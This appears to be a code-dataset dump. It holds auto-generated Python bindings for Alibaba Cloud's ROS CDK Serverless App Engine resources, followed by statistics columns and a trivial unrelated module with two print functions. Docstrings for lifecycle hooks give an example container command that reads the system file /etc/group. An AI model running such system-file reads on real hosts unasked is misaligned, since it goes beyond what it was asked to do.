'''
result = self._values.get("deploy")
return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], result)
@builtins.property
def edas_container_version(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: edasContainerVersion: EDAS pandora runtime environment used by the application.
'''
result = self._values.get("edas_container_version")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def envs(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: envs: Container environment variable parameters. For example: [{ "name": "envtmp", "value": "0"}]
'''
result = self._values.get("envs")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def image_url(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: imageUrl: Mirroring address. Image only type of application can be configured to mirror address.
'''
result = self._values.get("image_url")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def jar_start_args(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
jarStartArgs: Jar package startup application parameters. Apply the default startup command: $ JAVA_HOME / bin / java $ JarStartOptions -jar $ CATALINA_OPTS "$ package_path"
$ JarStartArgs
'''
result = self._values.get("jar_start_args")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def jar_start_options(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
jarStartOptions: Jar start the application package option. Apply the default startup command: $ JAVA_HOME / bin / java $ JarStartOptions -jar $ CATALINA_OPTS "$ package_path"
$ JarStartArgs
'''
result = self._values.get("jar_start_options")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def jdk(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: jdk: Deployment of JDK version of the package depends on. Mirroring not supported.
'''
result = self._values.get("jdk")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def liveness(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: liveness: Container health check, health check fails container will be killed and recovery. Currently only supports mode command issued in the container. The columns: { "exec": { "command": [ "sleep", "5s"]}, "initialDelaySeconds": 10, "timeoutSeconds": 11}
'''
result = self._values.get("liveness")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def mount_desc(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: mountDesc: Mount Description
'''
result = self._values.get("mount_desc")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def mount_host(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: mountHost: nas mount point in the application of vpc.
'''
result = self._values.get("mount_host")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def nas_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: nasId: Mount the NAS ID, you must be in the same region and cluster. It must be available to create a mount point limit, or switch on its mount point already in the VPC. If you do not fill, and there mountDescs field, the default will automatically purchase a NAS and mount it onto the switch within the VPC.
'''
result = self._values.get("nas_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def package_url(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: packageUrl: Deployment packages address. Only FatJar War or the type of application can be configured to deploy packet address.
'''
result = self._values.get("package_url")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def package_version(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: packageVersion: The version number of the deployed package, War FatJar type required. Please customize it meaning.
'''
result = self._values.get("package_version")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def post_start(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: postStart: Executing the script, such as after starting the format: { "exec": { "command": "cat", "/ etc / group"}}
'''
result = self._values.get("post_start")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def pre_stop(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: preStop: Script is executed before stopping the format as: { "exec": { "command": "cat", "/ etc / group"}}
'''
result = self._values.get("pre_stop")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def readiness(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: readiness: Application launch status check, health check fails repeatedly container will be killed and restarted. Do not pass health check of the vessel will not have to enter SLB traffic. For example: { "exec": { "command": [ "sleep", "6s"]}, "initialDelaySeconds": 15, "timeoutSeconds": 12}
'''
result = self._values.get("readiness")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def security_group_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: securityGroupId: Security group ID.
'''
result = self._values.get("security_group_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def sls_configs(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: slsConfigs: Log collection configuration file
'''
result = self._values.get("sls_configs")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def tags(self) -> typing.Optional[typing.List[RosApplication.TagsProperty]]:
'''
:Property: tags: Tags to attach to application. Max support 20 tags to add during create application. Each tag with two properties Key and Value, and Key is required.
'''
result = self._values.get("tags")
return typing.cast(typing.Optional[typing.List[RosApplication.TagsProperty]], result)
@builtins.property
def timezone(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: timezone: Application time zone. Default Asia/Shanghai.
'''
result = self._values.get("timezone")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def vpc_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: vpcId: EDAS namespace corresponding VPC. In Serverless in a corresponding one of the VPC namespace only, and can not be modified. Serverless first created in the application name space will form a binding relationship. You may correspond to a plurality of namespaces VPC. Do not fill was VpcId namespace binding.
'''
result = self._values.get("vpc_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def v_switch_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: vSwitchId: Application examples where the elastic card virtual switch. The switch must be located above the VPC. The same switch with EDAS namespace binding relationship. Do not fill was VSwitchId namespace binding.
'''
result = self._values.get("v_switch_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def war_start_options(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:: " start
:Property: warStartOptions: War Start the application package option. Apply the default startup command: java $ JAVA_OPTS $ CATALINA_OPTS -Options org.apache.catalina.startup.Bootstrap "$
'''
result = self._values.get("war_start_options")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def web_container(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: webContainer: Tomcat deployment of the package depends on the version. Mirroring not supported.
'''
result = self._values.get("web_container")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RosApplicationProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class RosNamespace(
ros_cdk_core.RosResource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-sae.RosNamespace",
):
'''A ROS template type: ``ALIYUN::SAE::Namespace``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "RosNamespaceProps",
enable_resource_property_constraint: builtins.bool,
) -> None:
'''Create a new ``ALIYUN::SAE::Namespace``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="ROS_RESOURCE_TYPE_NAME")
def ROS_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "ROS_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrNamespaceId")
def attr_namespace_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: NamespaceId: Namespace ID
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrNamespaceId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="rosProperties")
def _ros_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "rosProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="enableResourcePropertyConstraint")
def enable_resource_property_constraint(self) -> builtins.bool:
return typing.cast(builtins.bool, jsii.get(self, "enableResourcePropertyConstraint"))
@enable_resource_property_constraint.setter
def enable_resource_property_constraint(self, value: builtins.bool) -> None:
jsii.set(self, "enableResourcePropertyConstraint", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="namespaceId")
def namespace_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: namespaceId: Namespace ID. Format: "regionId:logicalId" or "logicalId"
'''
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "namespaceId"))
@namespace_id.setter
def namespace_id(
self,
value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "namespaceId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="namespaceName")
def namespace_name(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: namespaceName: Namespace name
'''
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "namespaceName"))
@namespace_name.setter
def namespace_name(
self,
value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "namespaceName", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="namespaceDescription")
def namespace_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: namespaceDescription: Namespace description
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "namespaceDescription"))
@namespace_description.setter
def namespace_description(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "namespaceDescription", value)
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-sae.RosNamespaceProps",
jsii_struct_bases=[],
name_mapping={
"namespace_id": "namespaceId",
"namespace_name": "namespaceName",
"namespace_description": "namespaceDescription",
},
)
class RosNamespaceProps:
def __init__(
self,
*,
namespace_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
namespace_name: typing.Union[builtins.str, ros_cdk_core.IResolvable],
namespace_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
) -> None:
'''Properties for defining a ``ALIYUN::SAE::Namespace``.
:param namespace_id:
:param namespace_name:
:param namespace_description:
'''
self._values: typing.Dict[str, typing.Any] = {
"namespace_id": namespace_id,
"namespace_name": namespace_name,
}
if namespace_description is not None:
self._values["namespace_description"] = namespace_description
@builtins.property
def namespace_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: namespaceId: Namespace ID. Format: "regionId:logicalId" or "logicalId"
'''
result = self._values.get("namespace_id")
assert result is not None, "Required property 'namespace_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def namespace_name(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: namespaceName: Namespace name
'''
result = self._values.get("namespace_name")
assert result is not None, "Required property 'namespace_name' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def namespace_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: namespaceDescription: Namespace description
'''
result = self._values.get("namespace_description")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RosNamespaceProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class RosSlbBinding(
ros_cdk_core.RosResource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-sae.RosSlbBinding",
):
'''A ROS template type: ``ALIYUN::SAE::SlbBinding``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "RosSlbBindingProps",
enable_resource_property_constraint: builtins.bool,
) -> None:
'''Create a new ``ALIYUN::SAE::SlbBinding``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="ROS_RESOURCE_TYPE_NAME")
def ROS_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "ROS_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrAppId")
def attr_app_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: AppId: Successful application deployment target ID
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrAppId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrChangeOrderId")
def attr_change_order_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ChangeOrderId: Return to release a single ID, used to query task execution status.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrChangeOrderId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="rosProperties")
def _ros_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "rosProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="appId")
def app_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: appId: Successful application deployment target ID
'''
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "appId"))
@app_id.setter
def app_id(
self,
value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "appId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="enableResourcePropertyConstraint")
def enable_resource_property_constraint(self) -> builtins.bool:
return typing.cast(builtins.bool, jsii.get(self, "enableResourcePropertyConstraint"))
@enable_resource_property_constraint.setter
def enable_resource_property_constraint(self, value: builtins.bool) -> None:
jsii.set(self, "enableResourcePropertyConstraint", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="internet")
def internet(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: internet: Binding public SLB. For example: [{ "port": 80, "targetPort": 8080, "protocol": "TCP"}], shows a container port 8080 through port 80 slb exposed service, the protocol is TCP, the blank is ignored.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "internet"))
@internet.setter
def internet(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "internet", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="internetSlbId")
def internet_slb_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: internetSlbId: Use SLB purchased specified, currently only supports non-shared examples
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "internetSlbId"))
@internet_slb_id.setter
def internet_slb_id(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "internetSlbId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="intranet")
def intranet(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: intranet: Bind private SLB. For example: [{ "port": 80, "targetPort": 8080, "protocol": "TCP"}], shows a container port 8080 through port 80 slb exposed service, the protocol is TCP, the blank is ignored.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "intranet"))
@intranet.setter
def intranet(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "intranet", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="intranetSlbId")
def intranet_slb_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: intranetSlbId: Use SLB purchased specified, currently only supports non-shared examples
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "intranetSlbId"))
@intranet_slb_id.setter
def intranet_slb_id(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "intranetSlbId", value)
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-sae.RosSlbBindingProps",
jsii_struct_bases=[],
name_mapping={
"app_id": "appId",
"internet": "internet",
"internet_slb_id": "internetSlbId",
"intranet": "intranet",
"intranet_slb_id": "intranetSlbId",
},
)
class RosSlbBindingProps:
def __init__(
self,
*,
app_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
internet: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
internet_slb_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
intranet: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
intranet_slb_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
) -> None:
'''Properties for defining a ``ALIYUN::SAE::SlbBinding``.
:param app_id:
:param internet:
:param internet_slb_id:
:param intranet:
:param intranet_slb_id:
'''
self._values: typing.Dict[str, typing.Any] = {
"app_id": app_id,
}
if internet is not None:
self._values["internet"] = internet
if internet_slb_id is not None:
self._values["internet_slb_id"] = internet_slb_id
if intranet is not None:
self._values["intranet"] = intranet
if intranet_slb_id is not None:
self._values["intranet_slb_id"] = intranet_slb_id
@builtins.property
def app_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: appId: Successful application deployment target ID
'''
result = self._values.get("app_id")
assert result is not None, "Required property 'app_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def internet(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: internet: Binding public SLB. For example: [{ "port": 80, "targetPort": 8080, "protocol": "TCP"}], shows a container port 8080 through port 80 slb exposed service, the protocol is TCP, the blank is ignored.
'''
result = self._values.get("internet")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def internet_slb_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: internetSlbId: Use SLB purchased specified, currently only supports non-shared examples
'''
result = self._values.get("internet_slb_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def intranet(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: intranet: Bind private SLB. For example: [{ "port": 80, "targetPort": 8080, "protocol": "TCP"}], shows a container port 8080 through port 80 slb exposed service, the protocol is TCP, the blank is ignored.
'''
result = self._values.get("intranet")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def intranet_slb_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: intranetSlbId: Use SLB purchased specified, currently only supports non-shared examples
'''
result = self._values.get("intranet_slb_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RosSlbBindingProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class SlbBinding(
ros_cdk_core.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-sae.SlbBinding",
):
'''A ROS resource type: ``ALIYUN::SAE::SlbBinding``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "SlbBindingProps",
enable_resource_property_constraint: typing.Optional[builtins.bool] = None,
) -> None:
'''Create a new ``ALIYUN::SAE::SlbBinding``.
Param scope - scope in which this resource is defined
Param id - scoped id of the resource
Param props - resource properties
:param scope: -
:param id: -
:param props: -
:param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrAppId")
def attr_app_id(self) -> ros_cdk_core.IResolvable:
'''Attribute AppId: Successful application deployment target ID.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrAppId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrChangeOrderId")
def attr_change_order_id(self) -> ros_cdk_core.IResolvable:
'''Attribute ChangeOrderId: Return to release a single ID, used to query task execution status.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrChangeOrderId"))
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-sae.SlbBindingProps",
jsii_struct_bases=[],
name_mapping={
"app_id": "appId",
"internet": "internet",
"internet_slb_id": "internetSlbId",
"intranet": "intranet",
"intranet_slb_id": "intranetSlbId",
},
)
class SlbBindingProps:
def __init__(
self,
*,
app_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
internet: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
internet_slb_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
intranet: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
intranet_slb_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
) -> None:
'''Properties for defining a ``ALIYUN::SAE::SlbBinding``.
:param app_id: Property appId: Successful application deployment target ID.
:param internet: Property internet: Binding public SLB. For example: [{ "port": 80, "targetPort": 8080, "protocol": "TCP"}], shows a container port 8080 through port 80 slb exposed service, the protocol is TCP, the blank is ignored.
:param internet_slb_id: Property internetSlbId: Use SLB purchased specified, currently only supports non-shared examples.
:param intranet: Property intranet: Bind private SLB. For example: [{ "port": 80, "targetPort": 8080, "protocol": "TCP"}], shows a container port 8080 through port 80 slb exposed service, the protocol is TCP, the blank is ignored.
:param intranet_slb_id: Property intranetSlbId: Use SLB purchased specified, currently only supports non-shared examples.
'''
self._values: typing.Dict[str, typing.Any] = {
"app_id": app_id,
}
if internet is not None:
self._values["internet"] = internet
if internet_slb_id is not None:
self._values["internet_slb_id"] = internet_slb_id
if intranet is not None:
self._values["intranet"] = intranet
if intranet_slb_id is not None:
self._values["intranet_slb_id"] = intranet_slb_id
@builtins.property
def app_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''Property appId: Successful application deployment target ID.'''
result = self._values.get("app_id")
assert result is not None, "Required property 'app_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def internet(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property internet: Binding public SLB.
For example: [{ "port": 80, "targetPort": 8080, "protocol": "TCP"}], shows a container port 8080 through port 80 slb exposed service, the protocol is TCP, the blank is ignored.
'''
result = self._values.get("internet")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def internet_slb_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property internetSlbId: Use SLB purchased specified, currently only supports non-shared examples.'''
result = self._values.get("internet_slb_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def intranet(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property intranet: Bind private SLB.
For example: [{ "port": 80, "targetPort": 8080, "protocol": "TCP"}], shows a container port 8080 through port 80 slb exposed service, the protocol is TCP, the blank is ignored.
'''
result = self._values.get("intranet")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def intranet_slb_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property intranetSlbId: Use SLB purchased specified, currently only supports non-shared examples.'''
result = self._values.get("intranet_slb_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "SlbBindingProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
__all__ = [
"Application",
"ApplicationProps",
"Namespace",
"NamespaceProps",
"RosApplication",
"RosApplicationProps",
"RosNamespace",
"RosNamespaceProps",
"RosSlbBinding",
"RosSlbBindingProps",
"SlbBinding",
"SlbBindingProps",
]
publication.publish()
| 44.914978
| 344
| 0.670565
| 13,471
| 113,051
| 5.464628
| 0.031698
| 0.034477
| 0.055424
| 0.112682
| 0.940962
| 0.936819
| 0.933559
| 0.930679
| 0.929212
| 0.924675
| 0
| 0.002252
| 0.21447
| 113,051
| 2,516
| 345
| 44.93283
| 0.826688
| 0.258414
| 0
| 0.832019
| 0
| 0
| 0.093725
| 0.017435
| 0
| 0
| 0
| 0
| 0.011522
| 1
| 0.138872
| false
| 0
| 0.006064
| 0.016374
| 0.256519
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b30fd496b963e697aa8e0003029d891d7b46554
| 104
|
py
|
Python
|
OOP/my_module.py
|
Architect0711/PythonReference
|
c96a745aa5bf407c843e6e6f8e2b0cc300d98379
|
[
"MIT"
] | null | null | null |
OOP/my_module.py
|
Architect0711/PythonReference
|
c96a745aa5bf407c843e6e6f8e2b0cc300d98379
|
[
"MIT"
] | null | null | null |
OOP/my_module.py
|
Architect0711/PythonReference
|
c96a745aa5bf407c843e6e6f8e2b0cc300d98379
|
[
"MIT"
] | null | null | null |
def method_1():
print("my_module.method_1()")
def method_2():
print("my_module.method_2()")
| 20.8
| 33
| 0.634615
| 16
| 104
| 3.75
| 0.4375
| 0.3
| 0.433333
| 0.633333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046512
| 0.173077
| 104
| 5
| 34
| 20.8
| 0.651163
| 0
| 0
| 0
| 0
| 0
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
